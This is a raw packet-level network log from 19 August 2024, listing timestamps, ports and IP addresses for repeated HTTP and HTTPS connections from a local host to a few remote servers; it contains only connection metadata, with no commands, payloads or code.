Aug 19, 2024 06:05:53.555496931 CEST	80	49840	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:53.555538893 CEST	49841	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:53.555588007 CEST	49840	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:53.556243896 CEST	49841	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:53.561011076 CEST	80	49841	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:53.599006891 CEST	443	49839	23.210.122.61	192.168.2.4
Aug 19, 2024 06:05:53.599062920 CEST	443	49839	23.210.122.61	192.168.2.4
Aug 19, 2024 06:05:53.599101067 CEST	49839	443	192.168.2.4	23.210.122.61
Aug 19, 2024 06:05:53.599124908 CEST	443	49839	23.210.122.61	192.168.2.4
Aug 19, 2024 06:05:53.599158049 CEST	49839	443	192.168.2.4	23.210.122.61
Aug 19, 2024 06:05:53.601269007 CEST	49839	443	192.168.2.4	23.210.122.61
Aug 19, 2024 06:05:53.610886097 CEST	443	49839	23.210.122.61	192.168.2.4
Aug 19, 2024 06:05:53.610919952 CEST	443	49839	23.210.122.61	192.168.2.4
Aug 19, 2024 06:05:53.610956907 CEST	49839	443	192.168.2.4	23.210.122.61
Aug 19, 2024 06:05:53.610980988 CEST	443	49839	23.210.122.61	192.168.2.4
Aug 19, 2024 06:05:53.611002922 CEST	443	49839	23.210.122.61	192.168.2.4
Aug 19, 2024 06:05:53.611006975 CEST	49839	443	192.168.2.4	23.210.122.61
Aug 19, 2024 06:05:53.611052990 CEST	49839	443	192.168.2.4	23.210.122.61
Aug 19, 2024 06:05:53.733400106 CEST	49839	443	192.168.2.4	23.210.122.61
Aug 19, 2024 06:05:53.733433962 CEST	443	49839	23.210.122.61	192.168.2.4
Aug 19, 2024 06:05:53.755532026 CEST	49842	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:05:53.755570889 CEST	443	49842	195.201.118.191	192.168.2.4
Aug 19, 2024 06:05:53.755697012 CEST	49842	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:05:53.755990028 CEST	49842	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:05:53.756020069 CEST	443	49842	195.201.118.191	192.168.2.4
Aug 19, 2024 06:05:54.314229965 CEST	80	49841	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:54.314284086 CEST	49841	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:54.317868948 CEST	49841	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:54.318324089 CEST	49843	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:54.323139906 CEST	80	49843	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:54.323160887 CEST	80	49841	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:54.323213100 CEST	49843	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:54.323225021 CEST	49841	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:54.323467016 CEST	49843	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:54.328303099 CEST	80	49843	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:54.637021065 CEST	443	49842	195.201.118.191	192.168.2.4
Aug 19, 2024 06:05:54.637145042 CEST	49842	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:05:54.640778065 CEST	49842	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:05:54.640810966 CEST	443	49842	195.201.118.191	192.168.2.4
Aug 19, 2024 06:05:54.641098022 CEST	443	49842	195.201.118.191	192.168.2.4
Aug 19, 2024 06:05:54.642999887 CEST	49842	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:05:54.643305063 CEST	49842	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:05:54.684546947 CEST	443	49842	195.201.118.191	192.168.2.4
Aug 19, 2024 06:05:55.079286098 CEST	80	49843	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:55.079359055 CEST	49843	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:55.112164974 CEST	443	49842	195.201.118.191	192.168.2.4
Aug 19, 2024 06:05:55.112241030 CEST	49842	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:05:55.112255096 CEST	443	49842	195.201.118.191	192.168.2.4
Aug 19, 2024 06:05:55.112318993 CEST	49842	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:05:55.114156008 CEST	49842	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:05:55.114190102 CEST	443	49842	195.201.118.191	192.168.2.4
Aug 19, 2024 06:05:55.117273092 CEST	49844	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:05:55.117316961 CEST	443	49844	195.201.118.191	192.168.2.4
Aug 19, 2024 06:05:55.117396116 CEST	49844	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:05:55.117964983 CEST	49844	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:05:55.117994070 CEST	443	49844	195.201.118.191	192.168.2.4
Aug 19, 2024 06:05:55.198209047 CEST	49843	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:55.198565006 CEST	49845	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:55.203377962 CEST	80	49843	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:55.203394890 CEST	80	49845	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:55.203490019 CEST	49843	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:55.203490019 CEST	49845	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:55.203588009 CEST	49845	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:55.208398104 CEST	80	49845	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:55.210587978 CEST	49845	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:55.216348886 CEST	49846	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:55.221203089 CEST	80	49846	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:55.221355915 CEST	49846	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:55.221463919 CEST	49846	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:55.226202965 CEST	80	49846	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:55.777484894 CEST	443	49844	195.201.118.191	192.168.2.4
Aug 19, 2024 06:05:55.777586937 CEST	49844	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:05:55.778182983 CEST	49844	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:05:55.778204918 CEST	443	49844	195.201.118.191	192.168.2.4
Aug 19, 2024 06:05:55.780283928 CEST	49844	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:05:55.780297041 CEST	443	49844	195.201.118.191	192.168.2.4
Aug 19, 2024 06:05:55.985274076 CEST	80	49846	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:55.985378027 CEST	49846	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:56.445550919 CEST	443	49844	195.201.118.191	192.168.2.4
Aug 19, 2024 06:05:56.445653915 CEST	443	49844	195.201.118.191	192.168.2.4
Aug 19, 2024 06:05:56.445739031 CEST	49844	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:05:56.486079931 CEST	49844	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:05:56.486121893 CEST	443	49844	195.201.118.191	192.168.2.4
Aug 19, 2024 06:05:56.545679092 CEST	49846	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:56.545958996 CEST	49847	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:56.549825907 CEST	49848	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:05:56.549895048 CEST	443	49848	195.201.118.191	192.168.2.4
Aug 19, 2024 06:05:56.549982071 CEST	49848	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:05:56.550626993 CEST	49848	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:05:56.550658941 CEST	443	49848	195.201.118.191	192.168.2.4
Aug 19, 2024 06:05:56.550795078 CEST	80	49847	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:56.550857067 CEST	49847	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:56.551211119 CEST	80	49846	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:56.551333904 CEST	49846	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:56.551386118 CEST	49847	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:56.556714058 CEST	80	49847	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:57.225585938 CEST	443	49848	195.201.118.191	192.168.2.4
Aug 19, 2024 06:05:57.225681067 CEST	49848	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:05:57.226304054 CEST	49848	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:05:57.226335049 CEST	443	49848	195.201.118.191	192.168.2.4
Aug 19, 2024 06:05:57.228039026 CEST	49848	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:05:57.228053093 CEST	443	49848	195.201.118.191	192.168.2.4
Aug 19, 2024 06:05:57.301047087 CEST	80	49847	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:57.301188946 CEST	49847	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:57.304819107 CEST	49847	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:57.305301905 CEST	49849	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:57.309978008 CEST	80	49847	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:57.310038090 CEST	49847	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:57.310066938 CEST	80	49849	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:57.310133934 CEST	49849	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:57.310451984 CEST	49849	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:57.315181017 CEST	80	49849	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:57.904172897 CEST	443	49848	195.201.118.191	192.168.2.4
Aug 19, 2024 06:05:57.904222012 CEST	443	49848	195.201.118.191	192.168.2.4
Aug 19, 2024 06:05:57.904249907 CEST	49848	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:05:57.904284000 CEST	443	49848	195.201.118.191	192.168.2.4
Aug 19, 2024 06:05:57.904300928 CEST	49848	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:05:57.904325962 CEST	49848	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:05:57.904360056 CEST	443	49848	195.201.118.191	192.168.2.4
Aug 19, 2024 06:05:57.904413939 CEST	49848	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:05:57.904603004 CEST	49848	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:05:57.904618979 CEST	443	49848	195.201.118.191	192.168.2.4
Aug 19, 2024 06:05:57.906372070 CEST	49850	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:05:57.906433105 CEST	443	49850	195.201.118.191	192.168.2.4
Aug 19, 2024 06:05:57.906558037 CEST	49850	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:05:57.906912088 CEST	49850	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:05:57.906934977 CEST	443	49850	195.201.118.191	192.168.2.4
Aug 19, 2024 06:05:58.098809958 CEST	80	49849	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:58.098953009 CEST	49849	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:58.213754892 CEST	49849	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:58.214029074 CEST	49851	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:58.218841076 CEST	80	49851	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:58.218974113 CEST	80	49849	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:58.219050884 CEST	49849	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:58.219060898 CEST	49851	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:58.219192028 CEST	49851	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:58.224184036 CEST	80	49851	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:58.571969986 CEST	443	49850	195.201.118.191	192.168.2.4
Aug 19, 2024 06:05:58.572052002 CEST	49850	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:05:58.572613001 CEST	49850	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:05:58.572630882 CEST	443	49850	195.201.118.191	192.168.2.4
Aug 19, 2024 06:05:58.574769974 CEST	49850	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:05:58.574784994 CEST	443	49850	195.201.118.191	192.168.2.4
Aug 19, 2024 06:05:59.017360926 CEST	80	49851	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:59.017415047 CEST	49851	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:59.020376921 CEST	49851	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:59.020740986 CEST	49852	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:59.025537968 CEST	80	49852	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:59.025619030 CEST	80	49851	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:59.025696039 CEST	49851	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:59.025718927 CEST	49852	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:59.025968075 CEST	49852	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:59.030742884 CEST	80	49852	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:59.218354940 CEST	443	49850	195.201.118.191	192.168.2.4
Aug 19, 2024 06:05:59.218406916 CEST	443	49850	195.201.118.191	192.168.2.4
Aug 19, 2024 06:05:59.218437910 CEST	49850	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:05:59.218478918 CEST	49850	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:05:59.218511105 CEST	443	49850	195.201.118.191	192.168.2.4
Aug 19, 2024 06:05:59.218604088 CEST	49850	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:05:59.218617916 CEST	443	49850	195.201.118.191	192.168.2.4
Aug 19, 2024 06:05:59.218689919 CEST	49850	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:05:59.218703985 CEST	443	49850	195.201.118.191	192.168.2.4
Aug 19, 2024 06:05:59.218760967 CEST	49850	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:05:59.219021082 CEST	49850	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:05:59.219044924 CEST	443	49850	195.201.118.191	192.168.2.4
Aug 19, 2024 06:05:59.220725060 CEST	49853	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:05:59.220769882 CEST	443	49853	195.201.118.191	192.168.2.4
Aug 19, 2024 06:05:59.220989943 CEST	49853	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:05:59.221245050 CEST	49853	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:05:59.221259117 CEST	443	49853	195.201.118.191	192.168.2.4
Aug 19, 2024 06:05:59.796633005 CEST	80	49852	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:59.796688080 CEST	49852	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:59.895407915 CEST	443	49853	195.201.118.191	192.168.2.4
Aug 19, 2024 06:05:59.896500111 CEST	49853	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:05:59.896953106 CEST	49853	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:05:59.896975040 CEST	443	49853	195.201.118.191	192.168.2.4
Aug 19, 2024 06:05:59.898747921 CEST	49853	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:05:59.898782015 CEST	443	49853	195.201.118.191	192.168.2.4
Aug 19, 2024 06:05:59.900870085 CEST	49852	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:59.900937080 CEST	49854	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:59.909276009 CEST	80	49854	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:59.910274029 CEST	80	49852	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:59.910362005 CEST	49854	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:59.910396099 CEST	49852	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:59.910567045 CEST	49854	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:59.913788080 CEST	49854	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:59.915438890 CEST	80	49854	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:59.915522099 CEST	49854	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:59.916158915 CEST	49855	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:59.920927048 CEST	80	49855	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:59.924504042 CEST	49855	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:59.924645901 CEST	49855	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:59.929400921 CEST	80	49855	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:00.557461977 CEST	443	49853	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:00.557538986 CEST	49853	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:00.557585001 CEST	443	49853	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:00.557616949 CEST	443	49853	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:00.557674885 CEST	49853	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:00.558015108 CEST	49853	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:00.558043003 CEST	443	49853	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:00.664706945 CEST	49856	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:00.664808989 CEST	443	49856	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:00.665060043 CEST	49856	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:00.665385962 CEST	49856	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:00.665421963 CEST	443	49856	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:00.703411102 CEST	80	49855	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:00.703505039 CEST	49855	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:00.822539091 CEST	49855	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:00.822851896 CEST	49857	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:00.827975988 CEST	80	49855	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:00.828000069 CEST	80	49857	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:00.828035116 CEST	49855	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:00.828085899 CEST	49857	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:00.828200102 CEST	49857	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:00.833245039 CEST	80	49857	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:00.835556030 CEST	49857	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:00.837908983 CEST	49858	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:00.842680931 CEST	80	49858	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:00.842746973 CEST	49858	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:00.842861891 CEST	49858	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:00.847661018 CEST	80	49858	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:01.320961952 CEST	443	49856	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:01.321044922 CEST	49856	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:01.321754932 CEST	49856	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:01.321775913 CEST	443	49856	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:01.323820114 CEST	49856	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:01.323833942 CEST	443	49856	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:01.324004889 CEST	49856	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:01.324023008 CEST	443	49856	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:01.614602089 CEST	80	49858	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:01.614654064 CEST	49858	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:01.664952993 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:01.665040016 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:01.665107965 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:01.665477991 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:01.665514946 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:01.730021954 CEST	49858	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:01.731125116 CEST	49860	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:01.735142946 CEST	80	49858	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:01.735943079 CEST	80	49860	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:01.736000061 CEST	49858	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:01.736041069 CEST	49860	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:01.736391068 CEST	49860	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:01.741233110 CEST	80	49860	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:01.950915098 CEST	443	49856	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:01.950987101 CEST	49856	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:01.951030016 CEST	443	49856	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:01.951066017 CEST	443	49856	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:01.951117992 CEST	49856	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:01.951953888 CEST	49856	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:01.951987982 CEST	443	49856	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:02.323185921 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:02.323246002 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:02.324234009 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:02.324244976 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:02.326781034 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:02.326792002 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:02.488652945 CEST	80	49860	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:02.488711119 CEST	49860	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:02.492244959 CEST	49860	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:02.492618084 CEST	49861	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:02.497222900 CEST	80	49860	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:02.497267008 CEST	49860	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:02.497354984 CEST	80	49861	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:02.497433901 CEST	49861	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:02.497602940 CEST	49861	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:02.502356052 CEST	80	49861	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:02.507575989 CEST	49861	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:02.620524883 CEST	49862	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:02.625284910 CEST	80	49862	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:02.625377893 CEST	49862	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:02.625613928 CEST	49862	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:02.630403996 CEST	80	49862	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:02.753175974 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:02.753228903 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:02.753257036 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:02.753273010 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:02.753283978 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:02.753304958 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:02.753325939 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:02.753362894 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:02.783890009 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:02.783936024 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:02.783999920 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:02.784029961 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:02.784044981 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:02.786552906 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:02.850713015 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:02.850760937 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:02.850790024 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:02.850806952 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:02.850821972 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:02.850840092 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:02.881870985 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:02.881917953 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:02.881982088 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:02.882009983 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:02.882033110 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:02.882947922 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:02.920546055 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:02.920588970 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:02.920633078 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:02.920672894 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:02.920696974 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:02.920720100 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:02.945450068 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:02.945497036 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:02.945533991 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:02.945548058 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:02.945573092 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:02.945585012 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:02.965883017 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:02.965925932 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:02.965981960 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:02.965992928 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:02.966031075 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:02.968455076 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:02.985249996 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:02.985292912 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:02.985342979 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:02.985357046 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:02.985395908 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:02.985409021 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.004015923 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.004076004 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.004117966 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.004132986 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.004157066 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.004168034 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.017412901 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.017458916 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.017493010 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.017503023 CEST	443	49859	195.201.118.191	192.168.2.4
